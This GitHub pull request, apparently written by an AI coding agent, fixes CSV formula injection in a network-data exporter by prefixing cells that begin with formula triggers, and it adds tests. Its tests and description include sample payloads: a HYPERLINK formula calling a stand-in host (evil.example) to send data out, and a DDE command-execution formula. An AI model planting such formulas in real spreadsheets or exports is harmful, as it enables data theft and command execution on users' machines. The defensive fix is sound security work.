### PR TITLE
Fix CSV/formula-injection vulnerability in CSV exporter

### DIFF
--- a/.changeset/csv-formula-injection-fix.md
+++ b/.changeset/csv-formula-injection-fix.md
@@ -1,0 +1,13 @@
+---
+'@codaco/network-exporters': patch
+---
+
+Fix a CSV/formula-injection vulnerability (OWASP) in the CSV exporter. Exported
+cell values include untrusted, participant-entered interview data; a value
+beginning with a spreadsheet formula trigger (`=`, `+`, `-`, `@`, tab, or CR)
+could be evaluated as a formula when the CSV is opened in Excel / Google Sheets /
+LibreOffice (data exfiltration via `HYPERLINK`/`WEBSERVICE`, or command
+execution via DDE). `sanitizeCellValue` now prefixes such string values with a
+single quote so spreadsheets treat them as literal text. This covers all CSV
+output (attributeList, edgeList, egoList, adjacencyMatrix). Existing
+quote-wrapping/escaping and non-string passthrough behavior are preserved.

--- a/packages/network-exporters/src/formatters/csv/__tests__/adjacencyMatrix.test.ts
+++ b/packages/network-exporters/src/formatters/csv/__tests__/adjacencyMatrix.test.ts
@@ -75,6 +75,23 @@ describe('adjacencyMatrixRows', () => {
     expect(rows.join('')).toBe(expected);
   });
 
+  it('neutralizes a formula-injection node id in header and row labels', () => {
+    const rows = Array.from(
+      adjacencyMatrixRows(
+        mockNetwork([
+          { [ncSourceUUID]: '=cmd', [ncTargetUUID]: '2' },
+        ]) as unknown as SessionWithResequencedIDs,
+        mockCodebook,
+        mockExportOptions,
+      ),
+    );
+    const csv = rows.join('');
+    // The "=cmd" node id is neutralized with a leading single quote wherever it
+    // appears as a header column or a row label.
+    expect(csv).toBe(",2,'=cmd\r\n2,0,1\r\n'=cmd,1,0\r\n");
+    expect(csv).not.toContain(',=cmd');
+  });
+
   it('renders an empty network as an empty header row', () => {
     const rows = Array.from(
       adjacencyMatrixRows(

--- a/packages/network-exporters/src/formatters/csv/__tests__/attributeList.test.ts
+++ b/packages/network-exporters/src/formatters/csv/__tests__/attributeList.test.ts
@@ -44,6 +44,30 @@ describe('attributeListRows', () => {
     expect(rows[1]).toContain('Jane');
   });
 
+  it('neutralizes a formula-injection attribute value in the emitted CSV', () => {
+    const network = makeNetwork([
+      {
+        [nodeExportIDProperty]: 1,
+        [egoProperty]: 'ego-1',
+        [entityPrimaryKeyProperty]: 'uid-1',
+        type: 'mock-node-type',
+        [entityAttributesProperty]: {
+          'mock-uuid-1': '=HYPERLINK("https://evil.example","click")',
+        },
+      } as SessionWithResequencedIDs['nodes'][number],
+    ]);
+
+    const rows = Array.from(
+      attributeListRows(network, mockCodebook, mockExportOptions),
+    );
+
+    // The cell is both prefixed (formula neutralized) and quoted (contains a comma).
+    expect(rows[1]).toContain(
+      '"\'=HYPERLINK(""https://evil.example"",""click"")"',
+    );
+    expect(rows[1]).not.toContain(',=HYPERLINK');
+  });
+
   it('yields only the header for an empty network', () => {
     const network = makeNetwork([]);
     const rows = Array.from(

--- a/packages/network-exporters/src/formatters/csv/__tests__/csvShared.test.ts
+++ b/packages/network-exporters/src/formatters/csv/__tests__/csvShared.test.ts
@@ -1,0 +1,61 @@
+import { describe, expect, it } from 'vitest';
+
+import { sanitizeCellValue } from '../csvShared';
+
+describe('sanitizeCellValue', () => {
+  describe('formula injection neutralization', () => {
+    it.each([
+      ['=', '=1+1'],
+      ['+', '+1+2'],
+      ['-', '-1+2'],
+      ['@', '@SUM(A1:A2)'],
+      ['tab', '\tleading-tab'],
+    ])(
+      'prefixes a leading single quote when the value starts with %s',
+      (_label, value) => {
+        expect(sanitizeCellValue(value)).toBe(`'${value}`);
+      },
+    );
+
+    it('both prefixes and quotes a CR-leading value (CR is also a difficult char)', () => {
+      expect(sanitizeCellValue('\rleading-cr')).toBe('"\'\rleading-cr"');
+    });
+
+    it('both prefixes and quotes a formula-leading value that also needs quoting', () => {
+      expect(sanitizeCellValue('=a,b')).toBe('"\'=a,b"');
+    });
+
+    it('does not neutralize a formula char that is not at position 0', () => {
+      expect(sanitizeCellValue('a=b+c')).toBe('a=b+c');
+    });
+  });
+
+  describe('existing behavior is preserved', () => {
+    it('leaves ordinary strings unchanged', () => {
+      expect(sanitizeCellValue('Jane Doe')).toBe('Jane Doe');
+    });
+
+    it('leaves empty strings unchanged', () => {
+      expect(sanitizeCellValue('')).toBe('');
+    });
+
+    it('wraps values containing difficult characters in double quotes', () => {
+      expect(sanitizeCellValue('a,b')).toBe('"a,b"');
+      expect(sanitizeCellValue('a\nb')).toBe('"a\nb"');
+      expect(sanitizeCellValue('a\r\nb')).toBe('"a\r\nb"');
+    });
+
+    it('doubles internal double quotes', () => {
+      expect(sanitizeCellValue('say "hi"')).toBe('"say ""hi"""');
+    });
+
+    it('passes through numbers, booleans, null and undefined unchanged', () => {
+      expect(sanitizeCellValue(42)).toBe(42);
+      expect(sanitizeCellValue(0)).toBe(0);
+      expect(sanitizeCellValue(true)).toBe(true);
+      expect(sanitizeCellValue(false)).toBe(false);
+      expect(sanitizeCellValue(null)).toBeNull();
+      expect(sanitizeCellValue(undefined)).toBeUndefined();
+    });
+  });
+});

--- a/packages/network-exporters/src/formatters/csv/adjacencyMatrix.ts
+++ b/packages/network-exporters/src/formatters/csv/adjacencyMatrix.ts
@@ -7,7 +7,7 @@ import {
 
 import type { SessionWithResequencedIDs } from '../../input';
 import type { ExportOptions } from '../../options';
-import { csvEOL, toAsyncBytes } from './csvShared';
+import { csvEOL, sanitizeCellValue, toAsyncBytes } from './csvShared';
 
 class AdjacencyMatrix {
   readonly uniqueNodeIds: string[];
@@ -51,7 +51,12 @@ class AdjacencyMatrix {
 
   *rows(): Generator<string, void, void> {
     const dataColumnCount = this.dimension;
-    yield `,${this.uniqueNodeIds.join(',')}${csvEOL}`;
+    // Node IDs are normally generated UUIDs, but sanitize the header/row labels
+    // anyway for defense-in-depth and consistency with the other CSV formatters.
+    const labels = this.uniqueNodeIds.map((id) =>
+      String(sanitizeCellValue(id) ?? ''),
+    );
+    yield `,${labels.join(',')}${csvEOL}`;
     let matrixIndex = 0;
     for (let row = 0; row < dataColumnCount; row += 1) {
       const cols: number[] = [];
@@ -62,7 +67,7 @@ class AdjacencyMatrix {
         cols.push(((this.arrayView[byteIndex] ?? 0) & bitmask) !== 0 ? 1 : 0);
         matrixIndex += 1;
       }
-      yield `${this.uniqueNodeIds[row]},${cols.join(',')}${csvEOL}`;
+      yield `${labels[row]},${cols.join(',')}${csvEOL}`;
     }
   }
 }

--- a/packages/network-exporters/src/formatters/csv/csvShared.ts
+++ b/packages/network-exporters/src/formatters/csv/csvShared.ts
@@ -23,6 +23,8 @@ export function sanitizeCellValue(
 ): string | number | boolean | null | undefined {
   if (value === null || value === undefined) return value;
   if (typeof value === 'object') {
+    // A JSON.stringify result always begins with `{`, `[`, or `"`, so it can
+    // never start with a formula trigger; no formula neutralization needed here.
     let serialized: string;
     try {
       serialized = JSON.stringify(value) ?? '';

--- a/packages/network-exporters/src/formatters/csv/csvShared.ts
+++ b/packages/network-exporters/src/formatters/csv/csvShared.ts
@@ -7,6 +7,17 @@ const containsDifficultCharacters = (value: string) =>
 
 const quoteValue = (value: string) => `"${value.replace(/"/g, '""')}"`;
 
+// Characters that trigger formula evaluation in spreadsheet applications when
+// they appear at the start of a cell. Prefixing the value with a single quote
+// forces the cell to be treated as literal text, neutralizing CSV/formula
+// injection (OWASP) from untrusted, participant-entered interview data.
+const FORMULA_TRIGGERS = ['=', '+', '-', '@', '\t', '\r'];
+
+const neutralizeFormula = (value: string) =>
+  value.length > 0 && FORMULA_TRIGGERS.includes(value[0]!)
+    ? `'${value}`
+    : value;
+
 export function sanitizeCellValue(
   value: unknown,
 ): string | number | boolean | null | undefined {
@@ -21,7 +32,10 @@ export function sanitizeCellValue(
     return quoteValue(serialized);
   }
   if (typeof value === 'string') {
-    return containsDifficultCharacters(value) ? quoteValue(value) : value;
+    const neutralized = neutralizeFormula(value);
+    return containsDifficultCharacters(neutralized)
+      ? quoteValue(neutralized)
+      : neutralized;
   }
   if (typeof value === 'number' || typeof value === 'boolean') {
     return value;


### PR DESCRIPTION
## Summary

Fixes a CSV/formula-injection vulnerability (OWASP) in `@codaco/network-exporters`. Exported CSV cell values include untrusted, participant-entered interview data (name generators, free-text prompts) as well as node/edge attribute values and identifiers/labels. A participant could enter a value such as:

```
=HYPERLINK("https://evil.example/?x="&A1,"click")
=cmd|'/c calc'!A1
```

which, when a researcher opens the exported CSV in Excel / Google Sheets / LibreOffice, is evaluated as a formula — enabling data exfiltration (`HYPERLINK`/`WEBSERVICE`) or command execution (DDE).

## Fix

The cell serializer `sanitizeCellValue` (`packages/network-exporters/src/formatters/csv/csvShared.ts`) now neutralizes formula triggers: when a **string** value's first character is one of `=`, `+`, `-`, `@`, TAB (`0x09`), or CR (`0x0D`), it is prefixed with a single quote (`'`), forcing spreadsheets to treat the cell as literal text.

- Neutralization happens **before** the existing quote-wrapping, so a formula-leading value that also contains a comma is both prefixed and quoted: `=a,b` → `"'=a,b"`.
- Existing behavior is preserved: non-string values pass through unchanged, the `" , \r \n` quote-wrapping/escaping rule still applies, mid-string formula chars (`a=b+c`) and empty strings are untouched.
- No new dependencies.

All list formatters (`attributeList`, `edgeList`, `egoList`) already route every cell — data **and** header rows — through `sanitizeCellValue`. The `adjacencyMatrix` formatter previously emitted node-id labels directly; it now routes its header/row labels through `sanitizeCellValue` too (defense-in-depth — these are normally generated UUIDs), so the fix covers all CSV output.

## Tests

- New unit tests for `sanitizeCellValue` covering each trigger char at position 0, the prefix+quote combination, ordinary/empty strings, mid-string formula chars, and non-string passthrough.
- New formatter-level integration tests asserting an `=`-leading attribute value (attributeList) and an `=`-leading node id (adjacencyMatrix) are neutralized in the emitted CSV.
- Full test suite, typecheck, and lint pass.

A changeset (`patch` to `@codaco/network-exporters`) is included. Fresco will pick up the fix by bumping its `@codaco/network-exporters` dependency.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---
_Generated by [Claude Code](https://claude.ai/code/session_01WEJtgQ5kirLgGPidvGayUP)_